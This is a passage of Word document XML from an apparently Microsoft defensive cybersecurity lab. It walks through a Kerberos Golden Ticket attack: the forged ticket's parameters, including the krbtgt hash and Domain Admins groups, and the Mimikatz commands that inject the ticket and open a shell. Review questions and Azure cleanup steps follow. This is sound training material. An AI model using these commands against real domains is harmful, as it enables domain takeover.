        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B08E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008B08E2">
        <w:t> – The RID of the account you will be impersonating. This could be a real account ID, such as the default administrator ID of 500, or a fake ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFC414" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="008B08E2" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B08E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008B08E2">
        <w:t xml:space="preserve"> – A list of groups to which the account in the ticket will belong. This will include Domain Admins by default so the ticket will be created with the maximum privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10720E28" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B08E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SID</w:t>
      </w:r>
      <w:r w:rsidRPr="008B08E2">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Domain SID. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295D4AD" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="008B08E2" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RC4 </w:t>
      </w:r>
      <w:r>
        <w:t>– It’s the NTLM hash for the krbtgt account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C908B" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0211F7F9" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we will inject the Kerberos ticket into the current session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662BCEA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00DD588C" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD588C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kerberos::ptt ticket.kirbi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F60BFE" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2D60BB" wp14:editId="6AE4D98C">
            <wp:extent cx="5943600" cy="1360424"/>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360424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36D579" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the current context you can launch a CMD with the forged token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8551D" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="003514A8" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003514A8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Misc::cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD62D13" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687AB41C" wp14:editId="465C97DF">
            <wp:extent cx="5943600" cy="1567900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 35"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567900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C0F30" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2A1845" w14:textId="75075A0D" w:rsidR="004F0702" w:rsidRDefault="004F0702" w:rsidP="007177CB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FC8674" w14:textId="3CBEE602" w:rsidR="008719B9" w:rsidRDefault="008719B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B0EE2" w14:textId="77777777" w:rsidR="00C3763B" w:rsidRDefault="00C3763B" w:rsidP="00C3763B">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc44074058"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Questions:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="18F6E88B" w14:textId="42B9DF31" w:rsidR="00C3763B" w:rsidRDefault="000B69B0" w:rsidP="00C3763B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Describe the main step of the Pass the hash attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EBA422" w14:textId="00B4EC23" w:rsidR="001837A8" w:rsidRDefault="001837A8" w:rsidP="00C3763B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B6491" w14:textId="77777777" w:rsidR="00DB45B4" w:rsidRDefault="00DB45B4" w:rsidP="00DB45B4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF604DB" w14:textId="77777777" w:rsidR="00DB45B4" w:rsidRDefault="00DB45B4" w:rsidP="00DB45B4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1212111D" w14:textId="77777777" w:rsidR="00DB45B4" w:rsidRDefault="00DB45B4" w:rsidP="00DB45B4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D39B4F" w14:textId="1CB328C4" w:rsidR="00D82221" w:rsidRDefault="00D82221" w:rsidP="00D82221">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What is a Golden ticket attack</w:t>
      </w:r>
      <w:r w:rsidR="005A25CB">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D5961" w14:textId="77777777" w:rsidR="00D82221" w:rsidRDefault="00D82221" w:rsidP="00D82221">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5A06F2" w14:textId="77777777" w:rsidR="001837A8" w:rsidRDefault="001837A8" w:rsidP="001837A8"/>
    <w:p w14:paraId="3A4D589E" w14:textId="444D8229" w:rsidR="001837A8" w:rsidRDefault="001837A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0078D7" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA6E97" w14:textId="5C51699B" w:rsidR="009B3BF8" w:rsidRPr="00F954C8" w:rsidRDefault="009B3BF8" w:rsidP="009B3BF8">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc44074059"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0301587F" w14:textId="77777777" w:rsidR="009B3BF8" w:rsidRPr="00A973CD" w:rsidRDefault="009B3BF8" w:rsidP="009B3BF8">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Duration: 10 minutes</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="182D0A40" w14:textId="77777777" w:rsidR="000F793C" w:rsidRPr="003B03E3" w:rsidRDefault="000F793C" w:rsidP="000F793C">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877619">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this exercise, attendees will </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deallocate and remove </w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">any Azure resources that were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>started</w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in support of the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8506E8" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRDefault="00E44B41" w:rsidP="00E44B41">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc526172147"/>
      <w:bookmarkStart w:id="26" w:name="_Toc44074060"/>
      <w:r>
        <w:t>Task 1: Stop and deallocated all the VMs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5C66E179" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRDefault="00E44B41" w:rsidP="00E44B41">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Properly shutdown all the VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4CE13" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRDefault="00E44B41" w:rsidP="00E44B41">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deallocate the VM in the Azure Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2970D" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRDefault="00E44B41" w:rsidP="00E44B41">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To Stop a VM, simply click on Unclaim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129BA25" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRDefault="00E44B41" w:rsidP="00E44B41"/>
    <w:p w14:paraId="48D6F0FC" w14:textId="77777777" w:rsidR="00E44B41" w:rsidRPr="003F2250" w:rsidRDefault="00E44B41" w:rsidP="00E44B41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E7E1B0" wp14:editId="72CA1D96">
            <wp:extent cx="5765388" cy="1644782"/>
            <wp:effectExtent l="0" t="0" r="698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8732" cy="1645736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE523C" w14:textId="77777777" w:rsidR="00070C99" w:rsidRPr="008A1AC1" w:rsidRDefault="00070C99" w:rsidP="00070C99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0078D7" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00070C99" w:rsidRPr="008A1AC1" w:rsidSect="000849CB">
      <w:headerReference w:type="even" r:id="rId43"/>
      <w:headerReference w:type="default" r:id="rId44"/>
      <w:footerReference w:type="even" r:id="rId45"/>
      <w:footerReference w:type="default" r:id="rId46"/>
      <w:headerReference w:type="first" r:id="rId47"/>
      <w:footerReference w:type="first" r:id="rId48"/>
      <w:type w:val="oddPage"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="990" w:right="720" w:bottom="965" w:left="720" w:header="720" w:footer="31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113109" w14:textId="77777777" w:rsidR="004F4807" w:rsidRPr="007E3D91" w:rsidRDefault="004F4807" w:rsidP="007E3D91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AE3641F" w14:textId="77777777" w:rsidR="004F4807" w:rsidRPr="007E3D91" w:rsidRDefault="004F4807" w:rsidP="007E3D91">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="1F0E6760" w14:textId="77777777" w:rsidR="004F4807" w:rsidRDefault="004F4807" w:rsidP="007E3D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8AE0A3" w14:textId="006FC1E8" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="00D53599">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10800"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve"> ©</w:t>
    </w:r>
    <w:r w:rsidR="00A61796">
      <w:t>2020</w:t>
    </w:r>
    <w:r w:rsidRPr="007E3D91">
      <w:t xml:space="preserve"> Microsoft Corporation</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-638339749"/>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p w14:paraId="6537F28F" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="0096164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9914908"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="230441BF" w14:textId="67ECEE64" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="00D53599">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
          <w:pBdr>
            <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          </w:pBdr>
          <w:tabs>
            <w:tab w:val="clear" w:pos="9360"/>
            <w:tab w:val="right" w:pos="10800"/>
          </w:tabs>
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00906266">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>3</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r>
          <w:t>©20</w:t>
        </w:r>
        <w:r w:rsidR="00DB45B4">
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidRPr="007E3D91">
          <w:t xml:space="preserve"> Microsoft Corporation</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="637805D2" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="007E3D91" w:rsidRDefault="00E772B8" w:rsidP="00D5359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FB9E20" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B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41AB93" w14:textId="77777777" w:rsidR="004F4807" w:rsidRPr="007E3D91" w:rsidRDefault="004F4807" w:rsidP="007E3D91">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48D6D4A3" w14:textId="77777777" w:rsidR="004F4807" w:rsidRPr="007E3D91" w:rsidRDefault="004F4807" w:rsidP="007E3D91">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="7900767C" w14:textId="77777777" w:rsidR="004F4807" w:rsidRDefault="004F4807" w:rsidP="007E3D9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871BC" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="000849CB">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
  </w:p>
  <w:p w14:paraId="144A5D23" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="000849CB" w:rsidRDefault="00E772B8" w:rsidP="000849CB">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>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F9E56" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="000849CB" w:rsidRDefault="00E772B8" w:rsidP="00D53599">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="2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612288" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="00F954C8">
    <w:pPr>
      <w:pStyle w:val="Titre1"/>
      <w:rPr>
        <w:sz w:val="160"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000849CB">
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="160"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8956DD" wp14:editId="1A48B3C7">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>166370</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1390015" cy="1390015"/>
          <wp:effectExtent l="0" t="0" r="63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oud-Workshop-Logo-w-Circle.png"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1390015" cy="1390015"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w14:paraId="3A9EA41C" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="0016086A" w:rsidRDefault="00E772B8" w:rsidP="00F954C8">
    <w:pPr>
      <w:pStyle w:val="Titre1"/>
      <w:rPr>
        <w:sz w:val="100"/>
        <w:szCs w:val="100"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0016086A">
      <w:rPr>
        <w:sz w:val="100"/>
        <w:szCs w:val="100"/>
      </w:rPr>
      <w:t xml:space="preserve">Microsoft </w:t>
    </w:r>
    <w:r w:rsidRPr="0016086A">
      <w:rPr>
        <w:sz w:val="100"/>
        <w:szCs w:val="100"/>
      </w:rPr>
      <w:br/>
      <w:t xml:space="preserve">Defensive Cybersecurity </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="100"/>
        <w:szCs w:val="100"/>
      </w:rPr>
      <w:t>Training</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="07459315" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B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93668F" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="000849CB" w:rsidRDefault="00C84DB1" w:rsidP="000849CB">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000849CB">
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Microsoft </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Defensive Cybersecurity Training</w:t>
    </w:r>
    <w:r w:rsidR="00E772B8">
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00E772B8">
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Windows</w:t>
    </w:r>
    <w:r w:rsidR="00E772B8">
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> security, </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Active Directory</w:t>
    </w:r>
    <w:r w:rsidR="00E772B8">
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">, and </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Azure AD</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="463F29E8" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B8" w:rsidP="007E3D91">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49F06C" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRPr="000849CB" w:rsidRDefault="00C84DB1" w:rsidP="00C84DB1">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000849CB">
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Microsoft </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Defensive Cybersecurity Training</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Times New Roman"/>
        <w:color w:val="353535" w:themeColor="text1"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Windows security, Active Directory, and Azure AD</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8610EB" w14:textId="77777777" w:rsidR="00E772B8" w:rsidRDefault="00E772B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558E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2662F1D8"/>
    <w:lvl w:ilvl="0" w:tplc="71786FE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BA420A"/>
